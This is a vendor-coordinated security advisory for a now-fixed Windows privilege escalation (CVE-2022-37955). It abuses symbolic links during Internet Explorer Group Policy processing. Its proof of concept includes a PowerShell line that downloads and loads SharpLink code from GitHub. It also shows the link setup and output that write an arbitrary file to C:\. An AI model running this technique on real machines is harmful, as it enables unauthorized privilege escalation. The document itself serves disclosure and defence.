usd-2022-0034 | Privilege Escalation in Microsoft Windows

Advisory ID: usd-2022-0034
Product: Microsoft Windows
Affected Version: Windows 10 (19044.1826), Windows Server 2019 (17763.3046), probably others...
Vulnerability Type: Improper Link Resolution Before File Access (CWE-59)  - Privilege Escalation
Security Risk: High
Vendor URL: https://www.microsoft.com
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE-Number: CVE-2022-37955

Affected Component(s)

The vulnerability affects Group Policy Updates that contain policy settings for the Internet Explorer. Not all
policy settings are affected. One of the affected policy settings is the Internet Explorer User Accelerators setting.

Desciption

Windows Group Policy Updates may allow low privileged user accounts to elevate their privileges by abusing symbolic file system links.

Windows Group Policies are used to control and define the working environment of users and computers within Active Directory.
They provide a great amount of control and allow to centrally manage Windows settings that should be unified within an organization.
Group Policy Settings are usually defined on a domain controller and pulled regularly by domain joined computers. After pulling the
configured settings, the computer is responsible for parsing and applying the obtained policies. During this processing, it was identified
that the component responsible for parsing Internet Explorer related policy settings performs a copy operation within a user controlled
location of the file system. By using symbloc file system links, it is possible to redirect this copy operation and write user controlled
files to arbitrary locations within the file system. From here, there are many known techniques to achieve a privilege escalation, like
DLL hijacking or overwriting service executables.

Proof of Concept

When processing Internet Explorer related Group Policy Updates, the file C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt
is used for storing log data. Before overwriting the file, it is copied to C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.
If a corresponding Group Policy Settings (like e.g. Internet Explorer User Accelerators) is configured, both files should already be present:

C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer>dir

   Directory of C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer

   28/07/2022  11:39    <DIR>          .
   28/07/2022  11:39    <DIR>          ..
   28/07/2022  11:39               713 brndlog.bak
   28/07/2022  11:39               713 brndlog.txt
   ...

Since the folder C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer is fully user controlled, it is possible to delete all items within it
(It might be the case that a process holds a lock on the directory C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer\\CacheStorage, but this
process is use conrolled and can be stopped). Afterwards, tools like SharpLink can be used to create symbolic
links for the files brndlog.txt and brandlog.bak. The file brndlog.txt needs to be linked to the file that should be copied and the file brndlog.bak
should be linked to the target location within the file system.

PS C:\\> echo "Hello World :D" > C:\\Users\\user\\hello.txt
PS C:\\> $c = iwr [https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs]() -UseBasicParsing
PS C:\\> Add-Type $c.Content
PS C:\\> $lg = New-Object de.usd.SharpLink.LinkGroup
PS C:\\> $lg.AddSymlink("C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", "C:\\Users\\user\\hello.txt")
PS C:\\> $lg.AddSymlink("C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", "C:\\usd.txt")
PS C:\\> $lg.Open()
[!] Junction directory C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer isn't empty. Delete files? (y/N) y
[+] Creating Junction: C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer -> \\RPC CONTROL
[+] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\brndlog.txt -> \\??\\C:\\Users\\user\\hello.txt
[+] Symlink setup successfully.
[+] Junction C:\\Users\\user\\AppData\\Local\\Microsoft\\Internet Explorer -> \\RPC CONTROL does already exist.
[+] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\brndlog.bak -> \\??\\C:\\usd.txt
[+] Symlink setup successfully.

After applying a Group Policy Update, the file C:\\usd.txt should be created with user controlled content:

PS C:\\> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\\> dir C:\\usd.txt

    Directory: C:\\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/28/2022  12:29 PM             34 usd.txt


PS C:\\> type .\\usd.txt
Hello World :D

Fix

Whenever high privileged services operate in user controlled parts of the file system they should verify that
file operations get not redirected to unintended locations. When operating on file system regions that are controled
by one particular user, this user should be impersonated during the operation.

References

• https://cwe.mitre.org/data/definitions/59.html
• https://github.com/usdAG/SharpLink
• https://github.com/googleprojectzero/symboliclink-testing-tools
• https://herolab.usd.de/security-advisories/usd-2021-0001/

Timeline

• 2022-07-29: Vulnerability identified by Tobias Neitzel
• 2022-08-01: Advisory submitted via MSRC
• 2022-08-19: Vendor reports submitted vulnerability out of scope of the Microsoft Bug Bounty program
• 2022-10-26: Vendor reports submitted vulnerability as fixed

Credits

This security vulnerability was identified by Tobias Neitzel of usd AG.